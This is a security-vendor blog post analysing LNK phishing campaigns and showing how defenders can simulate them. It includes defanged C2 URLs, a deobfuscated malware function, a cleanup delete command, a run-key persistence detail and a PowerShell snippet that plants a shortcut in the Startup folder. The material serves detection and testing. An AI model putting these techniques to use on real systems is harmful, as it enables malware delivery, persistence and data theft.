LNK or Swim: Analysis & Simulation of Recent LNK Phishing | Splunk


LNK Phishing Campaign and Evolution

With that background covered, let’s delve into several active campaigns we’ve observed, each leveraging the .LNK file format as the initial trigger for initiating the infection chain on targeted hosts or systems.

  • We’ll explore the tactics, techniques, and procedures (TTPs) employed by threat actors in these campaigns.
  • Then, we’ll demonstrate how defenders can extract the contents of LNKs using tools such as LECmd.

TTPs in LNK Phishing Campaigns

Let’s look at the TTPs that threat actors in these campaigns use. This helps us to:

  • Gain insight into their methodologies.
  • Enhance our understanding of emerging threats.

Command and Scripting Interpreter (T1059.001)

In a typical phishing campaign, threat actors deploy a straightforward yet impactful strategy by employing malicious LNK files to distribute malware. Crafted with a script or command line argument, these LNK files prompt a specific action upon user interaction.

For instance, clicking the deceptive LNK file — often disguised as a legitimate document titled ‘INVOICE#BUSAPOMKDS03’ — initiates a chain of events.

Upon execution, the LNK file triggers a command that copies a malicious file.bat from a remote domain to the %USERPROFILE%Musicfile.bat directory on the targeted host. This seemingly innocuous action culminates in the deployment of malware, notably AsyncRAT, potentially compromising the victim’s system. Figure 01 illustrates the deceptive LNK file at the heart of this phishing scheme.

Figure 01: AsyncRAT LNK Phishing Campaign

Data Encoding (T1132)

Rhadamanthys (1)(2), a Trojan Stealer, is another example of malware leveraging .LNK files in its phishing campaign. These specially crafted LNK files contain an embedded Base64-encoded PowerShell script designed to download a file from a malicious Command and Control (C2) URL, serving as the initial step in its attack chain.

Figure 02 illustrates how this deceptive .LNK file employs a notepad icon to entice users into clicking the malicious file, thereby initiating the attack.

Figure 02: Rhadamathys LNK Phishing Campaign

After decoding the Base64 string, we unveil a straightforward PowerShell script. This script is responsible for downloading another PowerShell script, which is subsequently executed using Invoke-Expression.

Figure 03: Rhadamathys LNK Decoded Powershell

Obfuscated Files or Information (T1027)

Another technique we saw commonly used in phishing .LNK campaigns is the obfuscation of scripts it tries to execute, such as PowerShell or batch script.

Figure 04 shows a ducktail LNK campaign that uses a caret “^” symbol as an obfuscation technique to break up commands or expressions to hinder readability and evade detection by security tools.

Figure 04: Ducktail LNK phishing campaign

Using CyberChef once more, we can decode the encoded string to reveal its contents, which include a command to download another file from its C2 server, thereby extending its attack chain.

Figure 05: Ducktail LNK Decode Powershell

Reconnaissance (TA0043)

Furthermore, threat actors have devised .LNK samples tailored to conduct reconnaissance on target hosts or systems. Upon execution, these .LNK files trigger PowerShell scripts designed to collect extensive system information. This includes details such as:

  • Processor specifications
  • Computer name
  • Current user
  • Loaded modules
  • Process list
  • Memory usage
  • MAC address
  • Registry size
  • IP address

Such reconnaissance activities enable threat actors to gather valuable intelligence for malicious activities.

Figure 06: LNK Recon

The reconnaissance operation saves all gathered system information, converts it into JSON format, and then transmits it to the C2 server controlled by the threat actor.

Figure 07: Recon Information

In addition, this .LNK file incorporates the PDF icon and embeds a dummy PDF file within its file structure. This tactic makes the LNK file seem legitimate, effectively disguising it as a PDF document. This deceptive appearance increases the likelihood of the target user inadvertently compromising the host system by clicking the LNK file.

Figure 08: Embedded PDF file

Indirect Command Execution (T1202)

Malicious .LNK files can abuse Windows utilities to evade security restrictions around command-line interpreter usage. This lets adversaries execute malicious commands discreetly, bypassing detection mechanisms that typically monitor command execution. This can lead to unauthorized system access or data compromise.

Figure 09 depicts a malicious LNK file observed in the wild. This LNK file uses a Living Off the Land Binary (LOLBIN) technique known as forfiles, a legitimate Windows utility, to execute PowerShell script, which initiates the download of a malicious payload in ZIP file format. Upon successful execution, this payload is deployed onto the compromised host, thereby facilitating further malicious activities by the threat actor.

Figure 09: LNK uses Forfiles LOLBIN

User Execution: Malicious File (T1204.002)

In this section, we’ve analyzed and reverse engineered a more intricate form of malicious LNK files compared to the four examples previously explored. We will dissect all the tactics and techniques employed by this malicious LNK file upon execution by the user.

When executed, this LNK file triggers a PowerShell script that employs obfuscation techniques such as the caret (^) symbol and string comments. These tactics are used to obscure the script’s functionality and evade detection during static analysis.

Figure 10: LNK Obfuscated Powershell

After reverse engineering and de-obfuscating the script, we discovered the PowerShell component extracts a series of bytes from the LNK code, which are then decrypted using XOR encryption. The decrypted data is then used to create two files:

  • One of these files is a dummy DOCX file, leveraging the icon to masquerade as a legitimate document.
  • The other file, a .CAB archive, is dropped as ‘$env:publicUHCYbG.cab’ and contains multiple malicious files to perpetuate the attack chain.

Figure 11 illustrates the encrypted data within the payload and its decrypted form after XOR decryption.

Figure 11: Decrypted Files

Next, the PowerShell component extracts the contents of the .CAB file by executing “expand.exe”, a built-in command line tool in Windows OS used to expand and extract compressed files.

Below is a comparison of the partly deobfuscated function versus the renamed function of the LNK PowerShell script responsible for extracting the decrypted .CAB file:

partly deobfuscated function

##
function koMIoWakvBvW
 {
   param($FMGlWEFVsTs, $esLEposvvv);
   expand $FMGlWEFVsTs  -F:* $esLEposvvv;
 };

the deobfuscated and renamed version

function mw_expand_cab_file
 {
   param($param_src_cab_file_path, $param_dest_cab_file_path);
   expand $param_src_cab_file_path  -F:* $param_dest_cab_file_path;
 };

After extracting the .CAB file, you’ll notice several incorporated files within it. The .LNK PowerShell script will locate the ‘start.vbs’ file and execute it to proceed with its malicious activities on the compromised host. Below is a brief overview of each file and its intended purpose:

unzip.exe:

This is an extraction utility for archives compressed in .zip file format.

Start.vbs:

This VBScript will execute 49120862.bat using CLSID .COM “ShellWindows” object.

49120862.bat:

This batch file adds the registry run key “svchostno2” in “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” and executes several other batch files: 78345839.bat, 47835693.bat, and 30440211.bat

78345839.bat:

This batch file uses unzip.exe to download and extract another zip file named “di3726.zip” from one of its C2 servers hxxps[:]//goosess[.]com/read/get[.]php.

After the zip archive extraction, the batch file will delete the archive file from the host using the following command : del /f /q %~dp0%fn%.zip > null

47835693.bat:

This batch file collects, encrypts, and sends system information and a list of files from the user’s Downloads, Documents, and Desktop folders to one of its C2 servers. Figure 12 depicts a screenshot of the relevant code snippet.

Figure 12: Collect data

30440211.bat:

This batch file downloads, decrypts, and extracts another .CAB file from one of its C2 servers hxxp[:]//stuckss[.]com/list[.]php?f=%COMPUTERNAME%[.]txt Then, it deletes the downloaded .CAB file.

60712945.bat:

This batch file executes a PowerShell script that takes two parameters: the first parameter is a URL link from which it downloads an encrypted RC4 file, and the second is the filename to which the decrypted content will be saved.

99548182.bat:

This batch file triggers a PowerShell script, and with RC4-encryption, encodes and sends a file path passed as a parameter to the specified C2 server parameter via HTTP POST.

30606240.bat:

This batch file changes the current working directory to the directory containing the batch file, retrieves the first item found in the specified first parameter, and saves that output to the file specified in its second parameter.

Figure 13 illustrates the attack chain of this malicious LNK file.

Figure 13: LNK Attack Chain (For a larger resolution of this diagram visit this link)


Simulating LNK Phishing Campaigns

As organization defenders, we need to be able to test our defenses — whether that be analytics, XDR or AV products — to ensure they are properly tuned and detecting or preventing malicious LNK usage.

In this section, we’ll share how you can test your detections in three ways:

  • Using Atomic Red Team.
  • Using LNK Generator.
  • Embedding CAB Files in LNKs.

Atomic Red Team

Let’s dive into the Atomic Red Team and check out T1547.009 Test Number 2. This particular test uses PowerShell to create a .LNK file and place it in the Startup directory. Upon startup, cmd.exe will spawn.

$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupT1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:WindowsSystem32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()

Using Invoke-AtomicTest we can view the test running:

Invoke-AtomicTest T1547.009 -ShowDetails -TestNumbers 2

Figure 14: Invoke Atomic test in Splunk Attack Range

Next, we can run the Atomic:

Invoke-AtomicTest T1547.009 -TestNumbers 2

Figure 15: T1547.009 (Invoke Atomic test in Splunk Attack Range, Splunk 2024)

As simple as that, we have written a LNK to the startup folder, which will run and start cmd.exe the next time a user logs on.

Now, we can run Atomic Red Team tests all day and write LNKs and run them, but what if we want to go a bit above and beyond using the Atomic Execution Framework? With that, we present to you two utilities to assist with testing your defenses against more interesting LNK behaviors:

  • LNK Generators
  • Embedded CAB Files

LNK Generator

LNK Generator is a tool that simplifies creating desktop shortcuts via an HTA file. This utility demonstrates the versatility of shortcuts in Windows, enabling actions from launching command lines to executing scripts.

We will highlight two functionalities:

  • A CMD shortcut that opens a Command Prompt.
  • A PowerShell script shortcut that downloads and executes an MSI package.

These examples show how shortcuts can range from simple utilities to complex operations, making the LNK Generator a practical tool for defenders looking to test their defenses.

How LNK Generator Works

Simply click on the desired button to lay down a corresponding LNK on your desktop. Then click the created LNK to observe its action. This process helps you understand how shortcuts can be dynamically created and used in a Windows environment.

You can retrieve the LNK Generator utility here.

Save and run the .HTA file in your lab environment. Once opened, you will see the interface:

Figure 16: LNK Generator (Splunk 2024)

We will demo two of the options.

First, click “Create CMD Shortcut” to write a .LNK to the desktop. Then click the .LNK.

Figure 17: LNK shortcut (Splunk 2024)

Next, double-click the CmdShortcut file. A new Command Prompt window will appear. Right-click and open the properties to the LNK, and you’ll see the Target was cmd.exe, as expected.

Figure 18: LNK shortcut (Splunk 2024)

Now, let’s check out the “Create PowerShell Script Shortcut”. This test will create the LNK, and the Target will be to run a PowerShell encodedcommand that downloads a MSI package from Atomic Red Team.

Figure 19: LNK shortcut (Splunk 2024)

Right click the LNK and review the Target:

Figure 20: LNK shortcut (Splunk 2024)

We can see here the Target includes the PowerShell encodedcommand. Below, in Notepad++, we see the full command and the non-Base64 version.

With that, double-click the LNK and an MSI will appear and run.

Figure 21: LNK shortcut (Splunk 2024)

Embedded CAB File in .LNK File

Another Atomic Test we will share simulates the behavior of a malicious .LNK file that incorporates an encrypted CAB file alongside a dummy document.

The brief video demonstration below showcases how the Splunk Threat Research Team applied reverse engineering techniques to a particularly intriguing .LNK file. This analysis allowed us to replicate a broad spectrum of notable TTPs observed during our investigation. By examining this malicious LNK file, which contained embedded files, we gained critical insights that were vital for our detection, development, and testing efforts.

Source: https://www.splunk.com/en_us/blog/security/lnk-phishing-analysis-simulation.html